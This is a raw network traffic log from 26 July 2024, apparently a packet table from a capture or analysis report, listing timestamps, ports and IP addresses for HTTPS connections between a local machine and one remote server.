Jul 26, 2024 18:56:23.243400097 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.243462086 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.243468046 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.243500948 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.244359016 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.244375944 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.244461060 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.244469881 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.244504929 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.245280981 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.245299101 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.245400906 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.245408058 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.245443106 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.246198893 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.246216059 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.246263981 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.246272087 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.246300936 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.246318102 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.247108936 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.247127056 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.247174978 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.247185946 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.247201920 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.247229099 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.247272968 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.248578072 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.248596907 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.248646975 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.248653889 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.248672962 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.248689890 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.262738943 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.262758017 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.262839079 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.262876987 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.262918949 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.263633966 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.263650894 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.263691902 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.263700008 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.263724089 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.263741016 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.300173998 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.300206900 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.300244093 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.300255060 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.300293922 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.314507961 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.314528942 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.314582109 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.314590931 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.314626932 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.330322981 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.330348015 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.330400944 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.330410004 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.330441952 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.344983101 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.345004082 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.345081091 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.345093966 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.345132113 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.359601974 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.359620094 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.359679937 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.359688044 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.359735966 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.373902082 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.373920918 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.373971939 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.373980045 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.374013901 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.393708944 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.393728018 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.393770933 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.393805027 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.393821001 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.394016027 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.417936087 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.417967081 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.418000937 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.418009043 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.418040037 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.437325001 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.437350035 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.437397957 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.437407017 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.437427998 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.437444925 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.464973927 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.465001106 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.465042114 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.465050936 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.465101957 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.465101957 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.474857092 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.474879980 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.474916935 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.474925041 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.474956036 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.474976063 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.475872040 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.475892067 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.475935936 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.475941896 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.475965977 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.475984097 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.476819992 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.476839066 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.476864100 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.476871014 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.476898909 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.477595091 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.477647066 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.477684975 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.477691889 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.477710009 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.477752924 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.477957964 CEST	49743	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.477976084 CEST	443	49743	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.479269981 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.479367018 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:23.479451895 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.480465889 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:23.480518103 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:24.206273079 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:24.206358910 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:24.206955910 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:24.206985950 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:24.214581013 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:24.214593887 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.168338060 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.168390036 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.168411970 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.168530941 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.168596983 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.168662071 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.170685053 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.170728922 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.170794010 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.170839071 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.170871019 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.170891047 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.183428049 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.183451891 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.183537006 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.183559895 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.183604956 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.189466953 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.189486980 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.189595938 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.189620018 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.189663887 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.200489044 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.200515032 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.200613022 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.200650930 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.200706005 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.222610950 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.222654104 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.222750902 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.222816944 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.222852945 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.225399971 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.225516081 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.225555897 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.225589037 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.225605965 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.225624084 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.225650072 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.236232996 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.236278057 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.236334085 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.236347914 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.236365080 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.236388922 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.240422010 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.240463972 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.240514040 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.240523100 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.240535021 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.240567923 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.244699955 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.244718075 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.244770050 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.244780064 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.244827986 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.259632111 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.259660959 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.259743929 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.259763002 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.259818077 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.263416052 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.263437033 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.263487101 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.263503075 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.263531923 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.263593912 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.267265081 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.267286062 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.267358065 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.267374039 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.267539024 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.270755053 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.270797968 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.270833969 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.270847082 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.270874023 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.271054029 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.276619911 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.276662111 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.276700974 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.276716948 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.276746035 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.276763916 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.282754898 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.282799006 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.282840967 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.282856941 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.282877922 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.282896042 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.285640001 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.285681963 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.285701036 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.285712957 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.285732031 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.285753012 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.289031029 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.289051056 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.289096117 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.289104939 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.289129019 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.289146900 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.292828083 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.292902946 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.293018103 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.293077946 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.296562910 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.296593904 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.296648026 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.296658993 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.296684027 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.296700954 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.299946070 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.299968004 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.299999952 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.300007105 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.300051928 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.309585094 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.309617043 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.309664011 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.309696913 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.309714079 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.309745073 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.313095093 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.313124895 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.313169003 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.313179016 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.313235998 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.316009998 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.316037893 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.316077948 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.316086054 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.316121101 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.316144943 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.317775011 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.317795992 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.317842007 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.317850113 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.317878008 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.317902088 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.320885897 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.320924997 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.320970058 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.320981979 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.321011066 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.321036100 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.322745085 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.322793007 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.322853088 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.322866917 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.322901964 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.322921991 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.325654984 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.325738907 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.325773954 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.325786114 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.325819016 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.325838089 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.327950001 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.327990055 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.328037977 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.328051090 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.328140020 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.328140974 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.331937075 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.331985950 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.332022905 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.332036972 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.332070112 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.332084894 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.334650993 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.334702015 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.334742069 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.334754944 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.334783077 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.334799051 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.336919069 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.336960077 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.336990118 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.337002039 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.337027073 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.337047100 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.339958906 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.340003967 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.340066910 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.340080023 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.340109110 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.340128899 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.342612982 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.342638016 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.342700005 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.342715025 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.342783928 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.351780891 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.351804972 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.351846933 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.351860046 CEST	443	49747	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:25.351886034 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.351907015 CEST	49747	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:25.357902050 CEST	443	49747	5.75.212.60	192.168.2.4
